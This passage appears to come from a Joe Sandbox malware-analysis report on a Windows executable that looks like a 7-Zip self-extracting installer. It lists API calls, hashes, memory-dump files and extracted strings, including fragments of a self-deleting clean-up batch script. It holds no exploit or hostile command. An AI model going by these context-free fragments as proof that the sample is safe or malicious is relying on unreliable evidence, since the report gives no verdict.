                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                        • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                                        • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                        • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                        • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                                        • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        • _wtol.MSVCRT ref: 004034E5
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                                        • _wtol.MSVCRT ref: 0040367F
                                                                                                        • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                        • String ID: .lnk
                                                                                                        • API String ID: 408529070-24824748
                                                                                                        • Opcode ID: fe29b86850b6584a4f253c84e51755890519a5cebd41027cd42a07a926e32aa0
                                                                                                        • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                                        • Opcode Fuzzy Hash: fe29b86850b6584a4f253c84e51755890519a5cebd41027cd42a07a926e32aa0
                                                                                                        • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                        • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                        • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                                        • wsprintfW.USER32 ref: 00401C95
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                        • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                        • API String ID: 2639302590-365843014
                                                                                                        • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                        • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                                        • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                        • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                                        APIs
                                                                                                        • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                        • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                        • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                        • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                        • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 829399097-0
                                                                                                        • Opcode ID: b9cbf9bda790a6388220d479b475a156c1e2b9e46ad6f4b7f0f6ac65af34f938
                                                                                                        • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                                                        • Opcode Fuzzy Hash: b9cbf9bda790a6388220d479b475a156c1e2b9e46ad6f4b7f0f6ac65af34f938
                                                                                                        • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                                                        • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                                                        • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                                                        • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                                                        • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                        • String ID:
                                                                                                        • API String ID: 1862581289-0
                                                                                                        • Opcode ID: 5afd75693816e096cb38d9cfb56cdb6fa5a1390c6eeb91725b01582b9db798b9
                                                                                                        • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                                                        • Opcode Fuzzy Hash: 5afd75693816e096cb38d9cfb56cdb6fa5a1390c6eeb91725b01582b9db798b9
                                                                                                        • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$AddressLibraryLoadProc
                                                                                                        • String ID: SetWindowTheme$\EA$uxtheme
                                                                                                        • API String ID: 324724604-1613512829
                                                                                                        • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                        • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                                                        • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                        • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                        • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                                        • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                        • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                        • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                                        • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                        • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                        • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                                        • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                        • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                        • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                                        • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                        • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                                        APIs
                                                                                                        • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                                        • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                                        • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                                        • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                        • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                        • API String ID: 3007203151-3467708659
                                                                                                        • Opcode ID: 8db0a852e8f07615ca71e89a5e8499d157ac21a3ef6ef0968c72f21250096e4b
                                                                                                        • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                                        • Opcode Fuzzy Hash: 8db0a852e8f07615ca71e89a5e8499d157ac21a3ef6ef0968c72f21250096e4b
                                                                                                        • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                          • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                          • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                          • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                          • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                          • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                        • _wtol.MSVCRT ref: 004047DC
                                                                                                        • _wtol.MSVCRT ref: 004047F8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                        • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                                        • API String ID: 2725485552-3187639848
                                                                                                        • Opcode ID: 176a5781913efe1eb66ce12b6334ecb6201c8ddbf0a651fa5ffb65b9d7765dbc
                                                                                                        • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                                        • Opcode Fuzzy Hash: 176a5781913efe1eb66ce12b6334ecb6201c8ddbf0a651fa5ffb65b9d7765dbc
                                                                                                        • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                                        APIs
                                                                                                        • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                                        • GetParent.USER32(?), ref: 00402E2E
                                                                                                        • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                                        • GetMenu.USER32(?), ref: 00402E55
                                                                                                        • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
